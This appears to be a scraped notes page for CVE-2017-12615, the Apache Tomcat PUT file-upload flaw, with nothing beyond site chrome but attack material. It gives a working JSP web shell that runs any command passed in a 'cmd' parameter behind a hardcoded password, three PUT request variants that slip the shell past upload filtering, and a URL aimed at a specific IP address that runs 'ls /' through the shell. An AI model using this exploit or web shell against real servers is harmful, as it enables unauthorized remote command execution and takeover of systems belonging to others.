2.5.1 CVE-2017-12615
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c) {
StringBuilder line = new StringBuilder();
try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String temp = null;while ((temp = buf.readLine()) != null) {
line.append(temp+"\n");}buf.close();} catch (Exception e) {
line.append(e.getMessage());}return line.toString();}%><%if("123".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){
out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>PUT /shell.jsp%20 HTTP/1.1
PUT /shell.jsp/ HTTP/1.1
PUT /shell.jsp:DATA HTTP/1.1http://219.153.49.228:42986/shell.jsp?cmd=ls /&pwd=123